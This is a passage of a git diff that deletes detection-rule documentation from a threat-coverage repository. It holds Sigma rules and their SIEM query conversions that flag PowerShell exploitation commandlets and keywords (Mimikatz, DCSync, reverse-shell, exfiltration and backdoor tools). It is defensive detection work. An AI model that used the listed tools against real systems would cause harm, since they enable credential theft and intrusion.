"Message.*.*New-HoneyHash.*" -or $_.message -match "Message.*.*Set-MacAttribute.*" -or $_.message -match "Message.*.*Invoke-DCSync.*" -or $_.message -match "Message.*.*Invoke-PowerDump.*" -or $_.message -match "Message.*.*Exploit-Jboss.*" -or $_.message -match "Message.*.*Invoke-ThunderStruck.*" -or $_.message -match "Message.*.*Invoke-VoiceTroll.*" -or $_.message -match "Message.*.*Set-Wallpaper.*" -or $_.message -match "Message.*.*Invoke-InveighRelay.*" -or $_.message -match "Message.*.*Invoke-PsExec.*" -or $_.message -match "Message.*.*Invoke-SSHCommand.*" -or $_.message -match "Message.*.*Get-SecurityPackages.*" -or $_.message -match "Message.*.*Install-SSP.*" -or $_.message -match "Message.*.*Invoke-BackdoorLNK.*" -or $_.message -match "Message.*.*PowerBreach.*" -or $_.message -match "Message.*.*Get-SiteListPassword.*" -or $_.message -match "Message.*.*Get-System.*" -or $_.message -match "Message.*.*Invoke-BypassUAC.*" -or $_.message -match "Message.*.*Invoke-Tater.*" -or $_.message -match "Message.*.*Invoke-WScriptBypassUAC.*" -or $_.message -match "Message.*.*PowerUp.*" -or $_.message -match "Message.*.*PowerView.*" -or $_.message -match "Message.*.*Get-RickAstley.*" -or $_.message -match "Message.*.*Find-Fruit.*" -or $_.message -match "Message.*.*HTTP-Login.*" -or $_.message -match "Message.*.*Find-TrustedDocuments.*" -or $_.message -match "Message.*.*Invoke-Paranoia.*" -or $_.message -match "Message.*.*Invoke-WinEnum.*" -or $_.message -match "Message.*.*Invoke-ARPScan.*" -or $_.message -match "Message.*.*Invoke-PortScan.*" -or $_.message -match "Message.*.*Invoke-ReverseDNSLookup.*" -or $_.message -match "Message.*.*Invoke-SMBScanner.*" -or $_.message -match "Message.*.*Invoke-Mimikittenz.*" -or $_.message -match "Message.*.*Invoke-AllChecks.*") -and  -not ($_.message -match "Get-SystemDriveInfo")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(Message.keyword:(*Invoke\-DllInjection* OR *Invoke\-Shellcode* OR *Invoke\-WmiCommand* OR *Get\-GPPPassword* OR *Get\-Keystrokes* OR *Get\-TimedScreenshot* OR *Get\-VaultCredential* OR *Invoke\-CredentialInjection* OR *Invoke\-Mimikatz* OR *Invoke\-NinjaCopy* OR *Invoke\-TokenManipulation* OR *Out\-Minidump* OR *VolumeShadowCopyTools* OR *Invoke\-ReflectivePEInjection* OR *Invoke\-UserHunter* OR *Find\-GPOLocation* OR *Invoke\-ACLScanner* OR *Invoke\-DowngradeAccount* OR *Get\-ServiceUnquoted* OR *Get\-ServiceFilePermission* OR *Get\-ServicePermission* OR *Invoke\-ServiceAbuse* OR *Install\-ServiceBinary* OR *Get\-RegAutoLogon* OR *Get\-VulnAutoRun* OR *Get\-VulnSchTask* OR *Get\-UnattendedInstallFile* OR *Get\-ApplicationHost* OR *Get\-RegAlwaysInstallElevated* OR *Get\-Unconstrained* OR *Add\-RegBackdoor* OR *Add\-ScrnSaveBackdoor* OR *Gupt\-Backdoor* OR *Invoke\-ADSBackdoor* OR *Enabled\-DuplicateToken* OR *Invoke\-PsUaCme* OR *Remove\-Update* OR *Check\-VM* OR *Get\-LSASecret* OR *Get\-PassHashes* OR *Show\-TargetScreen* OR *Port\-Scan* OR *Invoke\-PoshRatHttp* OR *Invoke\-PowerShellTCP* OR *Invoke\-PowerShellWMI* OR *Add\-Exfiltration* OR *Add\-Persistence* OR *Do\-Exfiltration* OR *Start\-CaptureServer* OR *Get\-ChromeDump* OR *Get\-ClipboardContents* OR *Get\-FoxDump* OR *Get\-IndexedItem* OR *Get\-Screenshot* OR *Invoke\-Inveigh* OR *Invoke\-NetRipper* OR *Invoke\-EgressCheck* OR *Invoke\-PostExfil* OR *Invoke\-PSInject* OR *Invoke\-RunAs* OR *MailRaider* OR *New\-HoneyHash* OR *Set\-MacAttribute* OR *Invoke\-DCSync* OR *Invoke\-PowerDump* OR *Exploit\-Jboss* OR *Invoke\-ThunderStruck* OR *Invoke\-VoiceTroll* OR *Set\-Wallpaper* OR *Invoke\-InveighRelay* OR *Invoke\-PsExec* OR *Invoke\-SSHCommand* OR *Get\-SecurityPackages* OR *Install\-SSP* OR *Invoke\-BackdoorLNK* OR *PowerBreach* OR *Get\-SiteListPassword* OR *Get\-System* OR *Invoke\-BypassUAC* OR *Invoke\-Tater* OR *Invoke\-WScriptBypassUAC* OR *PowerUp* OR *PowerView* OR *Get\-RickAstley* OR *Find\-Fruit* OR *HTTP\-Login* OR *Find\-TrustedDocuments* OR *Invoke\-Paranoia* OR *Invoke\-WinEnum* OR *Invoke\-ARPScan* OR *Invoke\-PortScan* OR *Invoke\-ReverseDNSLookup* OR *Invoke\-SMBScanner* OR *Invoke\-Mimikittenz* OR *Invoke\-AllChecks*) AND (NOT \*.keyword:(*Get\-SystemDriveInfo*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 <<EOF
-{
-  "metadata": {
-    "title": "Malicious PowerShell Commandlets",
-    "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(Message.keyword:(*Invoke\\-DllInjection* OR *Invoke\\-Shellcode* OR *Invoke\\-WmiCommand* OR *Get\\-GPPPassword* OR *Get\\-Keystrokes* OR *Get\\-TimedScreenshot* OR *Get\\-VaultCredential* OR *Invoke\\-CredentialInjection* OR *Invoke\\-Mimikatz* OR *Invoke\\-NinjaCopy* OR *Invoke\\-TokenManipulation* OR *Out\\-Minidump* OR *VolumeShadowCopyTools* OR *Invoke\\-ReflectivePEInjection* OR *Invoke\\-UserHunter* OR *Find\\-GPOLocation* OR *Invoke\\-ACLScanner* OR *Invoke\\-DowngradeAccount* OR *Get\\-ServiceUnquoted* OR *Get\\-ServiceFilePermission* OR *Get\\-ServicePermission* OR *Invoke\\-ServiceAbuse* OR *Install\\-ServiceBinary* OR *Get\\-RegAutoLogon* OR *Get\\-VulnAutoRun* OR *Get\\-VulnSchTask* OR *Get\\-UnattendedInstallFile* OR *Get\\-ApplicationHost* OR *Get\\-RegAlwaysInstallElevated* OR *Get\\-Unconstrained* OR *Add\\-RegBackdoor* OR *Add\\-ScrnSaveBackdoor* OR *Gupt\\-Backdoor* OR *Invoke\\-ADSBackdoor* OR *Enabled\\-DuplicateToken* OR *Invoke\\-PsUaCme* OR *Remove\\-Update* OR *Check\\-VM* OR *Get\\-LSASecret* OR *Get\\-PassHashes* OR *Show\\-TargetScreen* OR *Port\\-Scan* OR *Invoke\\-PoshRatHttp* OR *Invoke\\-PowerShellTCP* OR *Invoke\\-PowerShellWMI* OR *Add\\-Exfiltration* OR *Add\\-Persistence* OR *Do\\-Exfiltration* OR *Start\\-CaptureServer* OR *Get\\-ChromeDump* OR *Get\\-ClipboardContents* OR *Get\\-FoxDump* OR *Get\\-IndexedItem* OR *Get\\-Screenshot* OR *Invoke\\-Inveigh* OR *Invoke\\-NetRipper* OR *Invoke\\-EgressCheck* OR *Invoke\\-PostExfil* OR *Invoke\\-PSInject* OR *Invoke\\-RunAs* OR *MailRaider* OR *New\\-HoneyHash* OR *Set\\-MacAttribute* OR *Invoke\\-DCSync* OR *Invoke\\-PowerDump* OR *Exploit\\-Jboss* OR *Invoke\\-ThunderStruck* OR *Invoke\\-VoiceTroll* OR *Set\\-Wallpaper* OR *Invoke\\-InveighRelay* OR *Invoke\\-PsExec* OR *Invoke\\-SSHCommand* OR *Get\\-SecurityPackages* OR *Install\\-SSP* OR *Invoke\\-BackdoorLNK* OR *PowerBreach* OR *Get\\-SiteListPassword* OR *Get\\-System* OR *Invoke\\-BypassUAC* OR *Invoke\\-Tater* OR *Invoke\\-WScriptBypassUAC* OR *PowerUp* OR *PowerView* OR *Get\\-RickAstley* OR *Find\\-Fruit* OR *HTTP\\-Login* OR *Find\\-TrustedDocuments* OR *Invoke\\-Paranoia* OR *Invoke\\-WinEnum* OR *Invoke\\-ARPScan* OR *Invoke\\-PortScan* OR *Invoke\\-ReverseDNSLookup* OR *Invoke\\-SMBScanner* OR *Invoke\\-Mimikittenz* OR *Invoke\\-AllChecks*) AND (NOT \\*.keyword:(*Get\\-SystemDriveInfo*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(Message.keyword:(*Invoke\\-DllInjection* OR *Invoke\\-Shellcode* OR *Invoke\\-WmiCommand* OR *Get\\-GPPPassword* OR *Get\\-Keystrokes* OR *Get\\-TimedScreenshot* OR *Get\\-VaultCredential* OR *Invoke\\-CredentialInjection* OR *Invoke\\-Mimikatz* OR *Invoke\\-NinjaCopy* OR *Invoke\\-TokenManipulation* OR *Out\\-Minidump* OR *VolumeShadowCopyTools* OR *Invoke\\-ReflectivePEInjection* OR *Invoke\\-UserHunter* OR *Find\\-GPOLocation* OR *Invoke\\-ACLScanner* OR *Invoke\\-DowngradeAccount* OR *Get\\-ServiceUnquoted* OR *Get\\-ServiceFilePermission* OR *Get\\-ServicePermission* OR *Invoke\\-ServiceAbuse* OR *Install\\-ServiceBinary* OR *Get\\-RegAutoLogon* OR *Get\\-VulnAutoRun* OR *Get\\-VulnSchTask* OR *Get\\-UnattendedInstallFile* OR *Get\\-ApplicationHost* OR *Get\\-RegAlwaysInstallElevated* OR *Get\\-Unconstrained* OR *Add\\-RegBackdoor* OR *Add\\-ScrnSaveBackdoor* OR *Gupt\\-Backdoor* OR *Invoke\\-ADSBackdoor* OR *Enabled\\-DuplicateToken* OR *Invoke\\-PsUaCme* OR *Remove\\-Update* OR *Check\\-VM* OR *Get\\-LSASecret* OR *Get\\-PassHashes* OR *Show\\-TargetScreen* OR *Port\\-Scan* OR *Invoke\\-PoshRatHttp* OR *Invoke\\-PowerShellTCP* OR *Invoke\\-PowerShellWMI* OR *Add\\-Exfiltration* OR *Add\\-Persistence* OR *Do\\-Exfiltration* OR *Start\\-CaptureServer* OR *Get\\-ChromeDump* OR *Get\\-ClipboardContents* OR *Get\\-FoxDump* OR *Get\\-IndexedItem* OR *Get\\-Screenshot* OR *Invoke\\-Inveigh* OR *Invoke\\-NetRipper* OR *Invoke\\-EgressCheck* OR *Invoke\\-PostExfil* OR *Invoke\\-PSInject* OR *Invoke\\-RunAs* OR *MailRaider* OR *New\\-HoneyHash* OR *Set\\-MacAttribute* OR *Invoke\\-DCSync* OR *Invoke\\-PowerDump* OR *Exploit\\-Jboss* OR *Invoke\\-ThunderStruck* OR *Invoke\\-VoiceTroll* OR *Set\\-Wallpaper* OR *Invoke\\-InveighRelay* OR *Invoke\\-PsExec* OR *Invoke\\-SSHCommand* OR *Get\\-SecurityPackages* OR *Install\\-SSP* OR *Invoke\\-BackdoorLNK* OR *PowerBreach* OR *Get\\-SiteListPassword* OR *Get\\-System* OR *Invoke\\-BypassUAC* OR *Invoke\\-Tater* OR *Invoke\\-WScriptBypassUAC* OR *PowerUp* OR *PowerView* OR *Get\\-RickAstley* OR *Find\\-Fruit* OR *HTTP\\-Login* OR *Find\\-TrustedDocuments* OR *Invoke\\-Paranoia* OR *Invoke\\-WinEnum* OR *Invoke\\-ARPScan* OR *Invoke\\-PortScan* OR *Invoke\\-ReverseDNSLookup* OR *Invoke\\-SMBScanner* OR *Invoke\\-Mimikittenz* OR *Invoke\\-AllChecks*) AND (NOT \\*.keyword:(*Get\\-SystemDriveInfo*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious PowerShell Commandlets'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Message.keyword:(*Invoke\-DllInjection* *Invoke\-Shellcode* *Invoke\-WmiCommand* *Get\-GPPPassword* *Get\-Keystrokes* *Get\-TimedScreenshot* *Get\-VaultCredential* *Invoke\-CredentialInjection* *Invoke\-Mimikatz* *Invoke\-NinjaCopy* *Invoke\-TokenManipulation* *Out\-Minidump* *VolumeShadowCopyTools* *Invoke\-ReflectivePEInjection* *Invoke\-UserHunter* *Find\-GPOLocation* *Invoke\-ACLScanner* *Invoke\-DowngradeAccount* *Get\-ServiceUnquoted* *Get\-ServiceFilePermission* *Get\-ServicePermission* *Invoke\-ServiceAbuse* *Install\-ServiceBinary* *Get\-RegAutoLogon* *Get\-VulnAutoRun* *Get\-VulnSchTask* *Get\-UnattendedInstallFile* *Get\-ApplicationHost* *Get\-RegAlwaysInstallElevated* *Get\-Unconstrained* *Add\-RegBackdoor* *Add\-ScrnSaveBackdoor* *Gupt\-Backdoor* *Invoke\-ADSBackdoor* *Enabled\-DuplicateToken* *Invoke\-PsUaCme* *Remove\-Update* *Check\-VM* *Get\-LSASecret* *Get\-PassHashes* *Show\-TargetScreen* *Port\-Scan* *Invoke\-PoshRatHttp* *Invoke\-PowerShellTCP* *Invoke\-PowerShellWMI* *Add\-Exfiltration* *Add\-Persistence* *Do\-Exfiltration* *Start\-CaptureServer* *Get\-ChromeDump* *Get\-ClipboardContents* *Get\-FoxDump* *Get\-IndexedItem* *Get\-Screenshot* *Invoke\-Inveigh* *Invoke\-NetRipper* *Invoke\-EgressCheck* *Invoke\-PostExfil* *Invoke\-PSInject* *Invoke\-RunAs* *MailRaider* *New\-HoneyHash* *Set\-MacAttribute* *Invoke\-DCSync* *Invoke\-PowerDump* *Exploit\-Jboss* *Invoke\-ThunderStruck* *Invoke\-VoiceTroll* *Set\-Wallpaper* *Invoke\-InveighRelay* *Invoke\-PsExec* *Invoke\-SSHCommand* *Get\-SecurityPackages* *Install\-SSP* *Invoke\-BackdoorLNK* *PowerBreach* *Get\-SiteListPassword* *Get\-System* *Invoke\-BypassUAC* *Invoke\-Tater* *Invoke\-WScriptBypassUAC* *PowerUp* *PowerView* *Get\-RickAstley* *Find\-Fruit* *HTTP\-Login* *Find\-TrustedDocuments* *Invoke\-Paranoia* *Invoke\-WinEnum* *Invoke\-ARPScan* *Invoke\-PortScan* *Invoke\-ReverseDNSLookup* *Invoke\-SMBScanner* *Invoke\-Mimikittenz* *Invoke\-AllChecks*) AND (NOT \*.keyword:(*Get\-SystemDriveInfo*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (Message="*Invoke-DllInjection*" OR Message="*Invoke-Shellcode*" OR Message="*Invoke-WmiCommand*" OR Message="*Get-GPPPassword*" OR Message="*Get-Keystrokes*" OR Message="*Get-TimedScreenshot*" OR Message="*Get-VaultCredential*" OR Message="*Invoke-CredentialInjection*" OR Message="*Invoke-Mimikatz*" OR Message="*Invoke-NinjaCopy*" OR Message="*Invoke-TokenManipulation*" OR Message="*Out-Minidump*" OR Message="*VolumeShadowCopyTools*" OR Message="*Invoke-ReflectivePEInjection*" OR Message="*Invoke-UserHunter*" OR Message="*Find-GPOLocation*" OR Message="*Invoke-ACLScanner*" OR Message="*Invoke-DowngradeAccount*" OR Message="*Get-ServiceUnquoted*" OR Message="*Get-ServiceFilePermission*" OR Message="*Get-ServicePermission*" OR Message="*Invoke-ServiceAbuse*" OR Message="*Install-ServiceBinary*" OR Message="*Get-RegAutoLogon*" OR Message="*Get-VulnAutoRun*" OR Message="*Get-VulnSchTask*" OR Message="*Get-UnattendedInstallFile*" OR Message="*Get-ApplicationHost*" OR Message="*Get-RegAlwaysInstallElevated*" OR Message="*Get-Unconstrained*" OR Message="*Add-RegBackdoor*" OR Message="*Add-ScrnSaveBackdoor*" OR Message="*Gupt-Backdoor*" OR Message="*Invoke-ADSBackdoor*" OR Message="*Enabled-DuplicateToken*" OR Message="*Invoke-PsUaCme*" OR Message="*Remove-Update*" OR Message="*Check-VM*" OR Message="*Get-LSASecret*" OR Message="*Get-PassHashes*" OR Message="*Show-TargetScreen*" OR Message="*Port-Scan*" OR Message="*Invoke-PoshRatHttp*" OR Message="*Invoke-PowerShellTCP*" OR Message="*Invoke-PowerShellWMI*" OR Message="*Add-Exfiltration*" OR Message="*Add-Persistence*" OR Message="*Do-Exfiltration*" OR Message="*Start-CaptureServer*" OR Message="*Get-ChromeDump*" OR Message="*Get-ClipboardContents*" OR Message="*Get-FoxDump*" OR Message="*Get-IndexedItem*" OR Message="*Get-Screenshot*" OR Message="*Invoke-Inveigh*" OR Message="*Invoke-NetRipper*" OR Message="*Invoke-EgressCheck*" OR Message="*Invoke-PostExfil*" OR Message="*Invoke-PSInject*" OR Message="*Invoke-RunAs*" OR Message="*MailRaider*" OR Message="*New-HoneyHash*" OR Message="*Set-MacAttribute*" OR Message="*Invoke-DCSync*" OR Message="*Invoke-PowerDump*" OR Message="*Exploit-Jboss*" OR Message="*Invoke-ThunderStruck*" OR Message="*Invoke-VoiceTroll*" OR Message="*Set-Wallpaper*" OR Message="*Invoke-InveighRelay*" OR Message="*Invoke-PsExec*" OR Message="*Invoke-SSHCommand*" OR Message="*Get-SecurityPackages*" OR Message="*Install-SSP*" OR Message="*Invoke-BackdoorLNK*" OR Message="*PowerBreach*" OR Message="*Get-SiteListPassword*" OR Message="*Get-System*" OR Message="*Invoke-BypassUAC*" OR Message="*Invoke-Tater*" OR Message="*Invoke-WScriptBypassUAC*" OR Message="*PowerUp*" OR Message="*PowerView*" OR Message="*Get-RickAstley*" OR Message="*Find-Fruit*" OR Message="*HTTP-Login*" OR Message="*Find-TrustedDocuments*" OR Message="*Invoke-Paranoia*" OR Message="*Invoke-WinEnum*" OR Message="*Invoke-ARPScan*" OR Message="*Invoke-PortScan*" OR Message="*Invoke-ReverseDNSLookup*" OR Message="*Invoke-SMBScanner*" OR Message="*Invoke-Mimikittenz*" OR Message="*Invoke-AllChecks*") NOT ("Get-SystemDriveInfo"))
-```
-
-
-### logpoint
-    
-```
-(Message IN ["*Invoke-DllInjection*", "*Invoke-Shellcode*", "*Invoke-WmiCommand*", "*Get-GPPPassword*", "*Get-Keystrokes*", "*Get-TimedScreenshot*", "*Get-VaultCredential*", "*Invoke-CredentialInjection*", "*Invoke-Mimikatz*", "*Invoke-NinjaCopy*", "*Invoke-TokenManipulation*", "*Out-Minidump*", "*VolumeShadowCopyTools*", "*Invoke-ReflectivePEInjection*", "*Invoke-UserHunter*", "*Find-GPOLocation*", "*Invoke-ACLScanner*", "*Invoke-DowngradeAccount*", "*Get-ServiceUnquoted*", "*Get-ServiceFilePermission*", "*Get-ServicePermission*", "*Invoke-ServiceAbuse*", "*Install-ServiceBinary*", "*Get-RegAutoLogon*", "*Get-VulnAutoRun*", "*Get-VulnSchTask*", "*Get-UnattendedInstallFile*", "*Get-ApplicationHost*", "*Get-RegAlwaysInstallElevated*", "*Get-Unconstrained*", "*Add-RegBackdoor*", "*Add-ScrnSaveBackdoor*", "*Gupt-Backdoor*", "*Invoke-ADSBackdoor*", "*Enabled-DuplicateToken*", "*Invoke-PsUaCme*", "*Remove-Update*", "*Check-VM*", "*Get-LSASecret*", "*Get-PassHashes*", "*Show-TargetScreen*", "*Port-Scan*", "*Invoke-PoshRatHttp*", "*Invoke-PowerShellTCP*", "*Invoke-PowerShellWMI*", "*Add-Exfiltration*", "*Add-Persistence*", "*Do-Exfiltration*", "*Start-CaptureServer*", "*Get-ChromeDump*", "*Get-ClipboardContents*", "*Get-FoxDump*", "*Get-IndexedItem*", "*Get-Screenshot*", "*Invoke-Inveigh*", "*Invoke-NetRipper*", "*Invoke-EgressCheck*", "*Invoke-PostExfil*", "*Invoke-PSInject*", "*Invoke-RunAs*", "*MailRaider*", "*New-HoneyHash*", "*Set-MacAttribute*", "*Invoke-DCSync*", "*Invoke-PowerDump*", "*Exploit-Jboss*", "*Invoke-ThunderStruck*", "*Invoke-VoiceTroll*", "*Set-Wallpaper*", "*Invoke-InveighRelay*", "*Invoke-PsExec*", "*Invoke-SSHCommand*", "*Get-SecurityPackages*", "*Install-SSP*", "*Invoke-BackdoorLNK*", "*PowerBreach*", "*Get-SiteListPassword*", "*Get-System*", "*Invoke-BypassUAC*", "*Invoke-Tater*", "*Invoke-WScriptBypassUAC*", "*PowerUp*", "*PowerView*", "*Get-RickAstley*", "*Find-Fruit*", "*HTTP-Login*", "*Find-TrustedDocuments*", "*Invoke-Paranoia*", "*Invoke-WinEnum*", "*Invoke-ARPScan*", "*Invoke-PortScan*", "*Invoke-ReverseDNSLookup*", "*Invoke-SMBScanner*", "*Invoke-Mimikittenz*", "*Invoke-AllChecks*"]  -("Get-SystemDriveInfo"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*Invoke-DllInjection.*|.*.*Invoke-Shellcode.*|.*.*Invoke-WmiCommand.*|.*.*Get-GPPPassword.*|.*.*Get-Keystrokes.*|.*.*Get-TimedScreenshot.*|.*.*Get-VaultCredential.*|.*.*Invoke-CredentialInjection.*|.*.*Invoke-Mimikatz.*|.*.*Invoke-NinjaCopy.*|.*.*Invoke-TokenManipulation.*|.*.*Out-Minidump.*|.*.*VolumeShadowCopyTools.*|.*.*Invoke-ReflectivePEInjection.*|.*.*Invoke-UserHunter.*|.*.*Find-GPOLocation.*|.*.*Invoke-ACLScanner.*|.*.*Invoke-DowngradeAccount.*|.*.*Get-ServiceUnquoted.*|.*.*Get-ServiceFilePermission.*|.*.*Get-ServicePermission.*|.*.*Invoke-ServiceAbuse.*|.*.*Install-ServiceBinary.*|.*.*Get-RegAutoLogon.*|.*.*Get-VulnAutoRun.*|.*.*Get-VulnSchTask.*|.*.*Get-UnattendedInstallFile.*|.*.*Get-ApplicationHost.*|.*.*Get-RegAlwaysInstallElevated.*|.*.*Get-Unconstrained.*|.*.*Add-RegBackdoor.*|.*.*Add-ScrnSaveBackdoor.*|.*.*Gupt-Backdoor.*|.*.*Invoke-ADSBackdoor.*|.*.*Enabled-DuplicateToken.*|.*.*Invoke-PsUaCme.*|.*.*Remove-Update.*|.*.*Check-VM.*|.*.*Get-LSASecret.*|.*.*Get-PassHashes.*|.*.*Show-TargetScreen.*|.*.*Port-Scan.*|.*.*Invoke-PoshRatHttp.*|.*.*Invoke-PowerShellTCP.*|.*.*Invoke-PowerShellWMI.*|.*.*Add-Exfiltration.*|.*.*Add-Persistence.*|.*.*Do-Exfiltration.*|.*.*Start-CaptureServer.*|.*.*Get-ChromeDump.*|.*.*Get-ClipboardContents.*|.*.*Get-FoxDump.*|.*.*Get-IndexedItem.*|.*.*Get-Screenshot.*|.*.*Invoke-Inveigh.*|.*.*Invoke-NetRipper.*|.*.*Invoke-EgressCheck.*|.*.*Invoke-PostExfil.*|.*.*Invoke-PSInject.*|.*.*Invoke-RunAs.*|.*.*MailRaider.*|.*.*New-HoneyHash.*|.*.*Set-MacAttribute.*|.*.*Invoke-DCSync.*|.*.*Invoke-PowerDump.*|.*.*Exploit-Jboss.*|.*.*Invoke-ThunderStruck.*|.*.*Invoke-VoiceTroll.*|.*.*Set-Wallpaper.*|.*.*Invoke-InveighRelay.*|.*.*Invoke-PsExec.*|.*.*Invoke-SSHCommand.*|.*.*Get-SecurityPackages.*|.*.*Install-SSP.*|.*.*Invoke-BackdoorLNK.*|.*.*PowerBreach.*|.*.*Get-SiteListPassword.*|.*.*Get-System.*|.*.*Invoke-BypassUAC.*|.*.*Invoke-Tater.*|.*.*Invoke-WScriptBypassUAC.*|.*.*PowerUp.*|.*.*PowerView.*|.*.*Get-RickAstley.*|.*.*Find-Fruit.*|.*.*HTTP-Login.*|.*.*Find-TrustedDocuments.*|.*.*Invoke-Paranoia.*|.*.*Invoke-WinEnum.*|.*.*Invoke-ARPScan.*|.*.*Invoke-PortScan.*|.*.*Invoke-ReverseDNSLookup.*|.*.*Invoke-SMBScanner.*|.*.*Invoke-Mimikittenz.*|.*.*Invoke-AllChecks.*))(?=.*(?!.*(?:.*(?:.*Get-SystemDriveInfo)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_keywords.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_keywords.md
deleted file mode 100644
index c2681ec..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_keywords.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | Malicious PowerShell Keywords       |
-|:-------------------------|:------------------|
-| **Description**          | Detects keywords from well-known PowerShell exploitation frameworks |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://adsecurity.org/?p=2921](https://adsecurity.org/?p=2921)</li></ul>  |
-| **Author**               | Sean Metcalf (source), Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious PowerShell Keywords
-id: f62176f3-8128-4faa-bf6c-83261322e5eb
-status: experimental
-description: Detects keywords from well-known PowerShell exploitation frameworks
-modified: 2019/01/22
-references:
-    - https://adsecurity.org/?p=2921
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Sean Metcalf (source), Florian Roth (rule)
-date: 2017/03/05
-logsource:
-    product: windows
-    service: powershell
-    definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
-detection:
-    keywords:
-        Message:
-            - "*AdjustTokenPrivileges*"
-            - "*IMAGE_NT_OPTIONAL_HDR64_MAGIC*"
-            - "*Microsoft.Win32.UnsafeNativeMethods*"
-            - "*ReadProcessMemory.Invoke*"
-            - "*SE_PRIVILEGE_ENABLED*"
-            - "*LSA_UNICODE_STRING*"
-            - "*MiniDumpWriteDump*"
-            - "*PAGE_EXECUTE_READ*"
-            - "*SECURITY_DELEGATION*"
-            - "*TOKEN_ADJUST_PRIVILEGES*"
-            - "*TOKEN_ALL_ACCESS*"
-            - "*TOKEN_ASSIGN_PRIMARY*"
-            - "*TOKEN_DUPLICATE*"
-            - "*TOKEN_ELEVATION*"
-            - "*TOKEN_IMPERSONATE*"
-            - "*TOKEN_INFORMATION_CLASS*"
-            - "*TOKEN_PRIVILEGES*"
-            - "*TOKEN_QUERY*"
-            - "*Metasploit*"
-            - "*Mimikatz*"
-    condition: keywords
-falsepositives:
-    - Penetration tests
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "Message.*.*AdjustTokenPrivileges.*" -or $_.message -match "Message.*.*IMAGE_NT_OPTIONAL_HDR64_MAGIC.*" -or $_.message -match "Message.*.*Microsoft.Win32.UnsafeNativeMethods.*" -or $_.message -match "Message.*.*ReadProcessMemory.Invoke.*" -or $_.message -match "Message.*.*SE_PRIVILEGE_ENABLED.*" -or $_.message -match "Message.*.*LSA_UNICODE_STRING.*" -or $_.message -match "Message.*.*MiniDumpWriteDump.*" -or $_.message -match "Message.*.*PAGE_EXECUTE_READ.*" -or $_.message -match "Message.*.*SECURITY_DELEGATION.*" -or $_.message -match "Message.*.*TOKEN_ADJUST_PRIVILEGES.*" -or $_.message -match "Message.*.*TOKEN_ALL_ACCESS.*" -or $_.message -match "Message.*.*TOKEN_ASSIGN_PRIMARY.*" -or $_.message -match "Message.*.*TOKEN_DUPLICATE.*" -or $_.message -match "Message.*.*TOKEN_ELEVATION.*" -or $_.message -match "Message.*.*TOKEN_IMPERSONATE.*" -or $_.message -match "Message.*.*TOKEN_INFORMATION_CLASS.*" -or $_.message -match "Message.*.*TOKEN_PRIVILEGES.*" -or $_.message -match "Message.*.*TOKEN_QUERY.*" -or $_.message -match "Message.*.*Metasploit.*" -or $_.message -match "Message.*.*Mimikatz.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-Message.keyword:(*AdjustTokenPrivileges* OR *IMAGE_NT_OPTIONAL_HDR64_MAGIC* OR *Microsoft.Win32.UnsafeNativeMethods* OR *ReadProcessMemory.Invoke* OR *SE_PRIVILEGE_ENABLED* OR *LSA_UNICODE_STRING* OR *MiniDumpWriteDump* OR *PAGE_EXECUTE_READ* OR *SECURITY_DELEGATION* OR *TOKEN_ADJUST_PRIVILEGES* OR *TOKEN_ALL_ACCESS* OR *TOKEN_ASSIGN_PRIMARY* OR *TOKEN_DUPLICATE* OR *TOKEN_ELEVATION* OR *TOKEN_IMPERSONATE* OR *TOKEN_INFORMATION_CLASS* OR *TOKEN_PRIVILEGES* OR *TOKEN_QUERY* OR *Metasploit* OR *Mimikatz*)
-```
-
-
-### xpack-watcher
-    
-```
